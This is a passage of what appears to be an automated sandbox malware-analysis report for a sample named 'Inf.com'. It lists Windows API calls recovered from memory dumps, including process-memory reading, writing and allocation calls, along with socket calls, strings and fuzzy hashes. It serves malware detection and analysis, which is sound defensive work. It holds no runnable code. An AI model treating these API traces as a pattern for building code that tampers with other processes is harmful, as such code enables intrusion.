                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A71916
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A71922
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A71931
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A71938
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7194E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A71976
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A71982
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A71991
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A71998
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A719AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CCB
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CD8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CE5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CF2
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80CFF
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00A80B24,?,00A83D41,?,00000001,00A53AF4,?), ref: 00A80D0C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00A765BF
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A765D6
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00A765EE
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00A7660A
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00A76624
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 97476a171b00cf4d87acad9fcf1b8d1e3a8cdbac3d9c41a94eb506d637c488e4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 73a97216d156b63f8d0ae4c582aa3520c497dafe8a14b53e59079db3002b3fbf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97476a171b00cf4d87acad9fcf1b8d1e3a8cdbac3d9c41a94eb506d637c488e4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC018630500705ABEB249F50DE4EBD6BB78FB05705F408659B1C7614E1EBF4AA458A54
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DAD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DAE4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DAF6
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DB08
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4DB1A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2ba1bc3e0f0b2a6411d4867169e6c4c5980c39566a3319be22c00bd95691bd25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1e0b45b318636a49afa942c46fe4749309674545e005cc5af9f2bc7e130b82d7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ba1bc3e0f0b2a6411d4867169e6c4c5980c39566a3319be22c00bd95691bd25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04F03036946604ABC635EBA8FA86E1A77EDFE847507E50C1AF00AD7501CB30FC818B64
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4262E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4), ref: 00A42D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A42D38: GetLastError.KERNEL32(00AE1DC4,?,00A4DB51,00AE1DC4,00000000,00AE1DC4,00000000,?,00A4DB78,00AE1DC4,00000007,00AE1DC4,?,00A4DF75,00AE1DC4,00AE1DC4), ref: 00A42D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42640
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42653
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42664
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A42675
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c07adff44fe4239f7a5a619f6cd56490cf7cc9bc1b60e958562177c248a83625
                                                                                                                                                                                                                                                                                                    • Instruction ID: 518c075f505f7b0244eb8bd0fc1a2eacfdfafbd62931763473f66655879b9a17
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c07adff44fe4239f7a5a619f6cd56490cf7cc9bc1b60e958562177c248a83625
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0FE788421A09B9B22EFD8FD81E8C3B68FB64761385095BF415DA275C7310903BFC4
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A72B1D,?,?,00000034,00000800,?,00000034), ref: 00A7BDF4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A730AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A72B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00A7BDBF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00A7BD1C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A7BD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00A7BD42
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A7311A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A73167
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com,00000104), ref: 00A41AD9
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A41BA4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A41BAE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                    • API String ID: 2506810119-1499414326
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A7CBB1
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00A7CBF7
                                                                                                                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00AE29C0,01266C50), ref: 00A7CC40
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AADCD0,00000000,?,?,?,?), ref: 00AA4F48
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32 ref: 00AA4F65
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA4F75
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                    • Opcode ID: 596a619a1a5dc26412b4f64655c8092415ef54dcc292bf620fb61470f0615181
                                                                                                                                                                                                                                                                                                    • Instruction ID: 19fa4a2e2fe897da0e083c7e43224d91dc9d4924e894af447af6b695c163b087
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596a619a1a5dc26412b4f64655c8092415ef54dcc292bf620fb61470f0615181
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38319E71214205AFDB218F78CC45BEA7BA9EB4A334F205725F9B9A31E0D7B0AC519B50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00A93AD4,?,?), ref: 00A93DD5
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A93AD7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A93AF8
                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00A93B63
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                    • Opcode ID: ae60dd859ceb7428d0e85630ccb2b1303c312635e336fe7ef03cf6b8d75aa360
                                                                                                                                                                                                                                                                                                    • Instruction ID: 40757dbbc46ffac863426a33f7b945205109ea4ef4482137fb349453d28cc37e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae60dd859ceb7428d0e85630ccb2b1303c312635e336fe7ef03cf6b8d75aa360
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF3193367002019FCF10CF68C586EAA77F1EF15328F248159E8168B792D771EE45C760
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AA49DC
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AA49F0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA4A14
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                    • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c409a6c6c98e33d0ed71c9e7a19948a62bc230de0524d2b5ac9b26a3e1aff0f
                                                                                                                                                                                                                                                                                                    • Instruction ID: fa7e85c72396d65383d1c91f04092ac647d58882b40d1cc77d71de5e81500149
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c409a6c6c98e33d0ed71c9e7a19948a62bc230de0524d2b5ac9b26a3e1aff0f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1321AD32610219ABDF11CF90CC42FEB3B69EF89714F110214FA556B1D0D7B5A8519B90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AA51A3
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AA51B1
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AA51B8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
